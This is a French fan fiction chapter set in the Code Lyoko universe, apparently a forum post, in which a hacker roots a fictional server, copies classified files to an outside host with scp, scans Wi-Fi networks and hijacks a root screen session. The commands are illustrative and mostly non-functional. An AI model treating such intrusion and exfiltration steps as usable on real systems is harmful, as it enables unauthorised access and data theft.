open("/dev/lyoko", X_WRITE) = -1 EACCES (Access Denied)
- Bon, là, ça devrait marcher ... disait Nico en relançant un programme légérement modifié depuis le lamentable crash d'il y a quelque seconde.
console a écrit:[www-data@lucifer.nsa.gov /tmp] ./wtf --vbig=/usr/local/lib/libssl.so /tmp/.sshagent-0
Exploiting SSL security hole in ssh-agent... Done !
# id -a
uid=0(root) gid=0(root) groups=0(root)
- r00ted, maintenant récuperer les dossiers classifié et deconnection, faut pas trop trainer sur ce serveur.
console a écrit:Broadcast message from security@lucifer on ttyp42 at 19:30 ...
Warning ! Security Violation Detected !
Please backup your files and disconnect NOW !
System is going to shutdown in 20 seconds !
- M<BIIIIIIIIIIIIIIIP> detecté ! Recuperer ce que je peux ...
console a écrit:# scp /priv/data/* hehe@zoom.ps4net17.com:/opt/cstrike/datas/
Broadcast message from root@lucifer on ttyp0 at 19:30 ...
System is going to shutdown in 5 seconds !
# Connection reset by peer
ssh: Connection reset by peer
hehe@zoom:/opt/cstrike/datas/$ ls
<...>
project-carthage.tar.bz2
project-xanadu.tar.bz2
<...>
- Vite, migrer ces données ...
20 minutes plus tard, l'ensemble des fichiers etait sur le disque dur de l'ordinateur portable de Nico, dans une partition crypté.
Nico déconnecta son modem acoustique de la cabine téléphonique, rangea son materiel et s'en alla aprés avoir effaçait toute traces de sa presence.
** De nos jours, Lyokonautes**
C'etait la rentré des classes au lycée, aprés le speech toujours aussi navrant du proviseur, ce fut la recreation.
Il y avait des nouveaux éléves.
Les lyokonautes s'etait retrouvé à coté d'un banc.
- Passé de bonne vacance Jéremi ? demanda Ulrich à un Jéremie penché sur son ordinateur portable.
- J'ai fais la maintenance du SC avec Aelita et on a decouvert de vieux programmes appartenant à Franz Hopper. Je ne sais pas encore ce que c'est exactement mais j'espere bien le decouvrir. dit rapidement Jeremie en levant à peine les yeux de son écran.
- En tous cas, il n'y a pas que toi qui est accro. dit Odd en regardant un des nouveaux eleves avec son ordinateur portable ouvert et qui semblait trés concentré par ce qu'il voyait.
Brusquement, il les regarda puis la recreation pris fin.
** ..., Nico **
- Enfin la recré, je tenais plus !
Nico sortit son ordinateur portable, le sortit de vieille et lança iwlist scan
Une longue liste apparues dans le shell mais une entrée attira son attention.
console a écrit:Cell 01 - Address: 02:03:05:07:11:13
ESSID:"xanadu"
Mode:Master
Frequency:2.462 GHz (Channel 11)
Signal level:-55 dBm Noise level:-88 dBm
Encryption key:on
- 02:03:05:07:11:13 ? Mais c'est la séquence de, Nico ne finit pas sa phrase, trop occupai a configurer airodump qui lui fit une autre surprise.
2 autres machine dont une trés proche de lui était connecté à xanadu.
Nico chercha d'autre personnes ayant un ordinateur portable et repéra un groupe d'eleves affalé sur un banc.
La cloche sonna, il poussa un soupir puis se dirigea vers la salle de cour.
** Quelque heures de cour plus tard, Aelita,Jeremie,Nico **
Aelita et Jeremie sortir de cour et allérent à l'usine.
Derriére eux, Nico les suivaient.
A mesure que Nico s'approchait de l'anciene usine Renaut, son ordinateur portable capté de mieux en mieux l'AP ayant l'adresse MAC 02:03:05:07:11:13.
Il vit Jéremie & Aelita qui descendait par un accenseur.
- Pas question d'utiliser l'ascenceur donc je vais encore joué à James Bond pensa Nico.
Il sortit de son sac son equipement d'escalade et commença à descendre en utilisant le cable.
Quand il fut suffisant proche du toit de la cabine, il sauta dessus.
Malheuresement, à ce moment Jeremie, ayant decidé d'aller examiner les scanner, appuya sur le bouton pour descendre.
Nico se retrouva dans le vide.
- Bon c'est pas grave, je vais me balancer pour atteindre l'autre coté.
Aprés 2-3 minutes de mouvements, il s'accrocha et declenchant l'ouverture de la porte, entra dans la salle.
- Et M<BIIIIIIIIIIIIIIIP>, Xanadu....
Il s'approcha des écrans et ouvrit un shell.
À ce moment là, un programme nommé SuperScan afficha une alerte.
- Tour activée, oops Xana ...
Nico tapa vite des commandes sur la console, ouvrit un fichier sur son ordinateur portable et commença une partie de hack ...
- Les tours sont generé par un prog qui ecris et lit le fichier /apps/lyoko/var/state.db et je peux ecrire dessus.
Si je réecrit le fichier, est-ce que ...
Non, le prog fait des checks d'integrités ...
A ce moment là, l'oeil de Nico tomba sur une partie «Gestion des Utilisateurs» et tenta machinalement de lister les utilisateurs connecté.
console a écrit:SC> show user * summary
10 years, 4 months, 13 days, 21:11:03 up 6:57, 91 users, load average: 16,19, 8,11, 9,09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
xana pte/6 [UNKNW] [UNKNW] 0.00s 0.02s 0.00s /usr/xana/bin/attack
franz pte/21 - 10 years, 4 months, 13 days, 21:00 14.24s 0.00s 0.00s /sys/bin/gest
root pts/0 - - - - - [screen]
- Mais screen est suid ...
Il appella screen -r et eue un joli prompt root.
Il killa tout les processus de pte/6 et le SuperScan signala que la tour se désactiva.
- Piouf ...
- Qui êtes-vous ? dit une voie derriére lui.
Nico regarda derriére lui et vis Jéremie et Aelita qui n'était pas vraiment content de le voir.
- Qu'avait vous fait ?
A ce moment là, un message d'erreur apparut sur l'ecran.
=> La suite quand je pourrai
J'ai juste mis en place la situation de départ.
Aucun serveur n'a été blessé pendant l'ecriture de cette partie :P